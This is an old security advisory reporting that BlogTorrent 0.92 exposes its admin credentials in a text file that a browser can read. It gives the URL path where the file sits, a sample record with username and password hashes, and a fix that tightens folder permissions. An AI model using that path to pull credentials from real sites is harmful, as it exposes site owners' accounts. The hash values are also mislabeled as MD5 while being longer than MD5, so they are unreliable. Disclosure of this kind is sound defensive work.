noglobal ~ security http://noglobal.secnet.org/ __ ___ ______ | |/ _ \ / _____\_ | / | || ||_ _| |___|__| || |__) | _ _ _ _ _ ______ |_______| |_\______/_|_|_|_|_|_|_____/ You think you know? but you have no idea.. |___| | \______ \________/ Security Advisory 2005-0x00 Software: BlogTorrent 0.92 <= Vendor: http://www.blogtorrent.com/ Author: LazyCrs && pjphem Date: 10/07/2005 Type: Remote/Local User Password Disclosure #0x01 - Description BlogTorrent BlogTorrent is software that makes it much easier to share and download large file useing the bittorrent protocol. That blog is easy to install, it don't require MySQL, Blog Torrent is easy for users: even if they don't know what bitorrent is, they get an installer that downloads the file they want, blogtorrent makes publishing with bittorrent painless. #0x02 - Bug BlogTorrent puts precious information as user and password, This and' caused because' the data related to the admin acount are saved in a text file, it can visible with browser. #0x03 - POC http://test/path_of_blog/data/newusers = d40:14ae696abdca1688dd577fe486c3981f331457b0d7:Createdi1120957648e5:Email17:email@email4:Hash40:d7b82821fe725305bded2fab9e91ed1e0e6fd93bee Username (crypt in md5) -> 14ae696abdca1688dd577fe486c3981f331457b0d7 Password (crypt in md5) -> d7b82821fe725305bded2fab9e91ed1e0e6fd93bee #0x04 - Solution The solution is set the permissions on 'data/' 'torrents/' type: chmod 700 data/ ; chmod 700 torrents/ #LazyCrs[AT]GMail[DOT]com - pjphem[AT]mybox[DOT]it #FREE RAFA! FREE RAFA! FREE RAFA!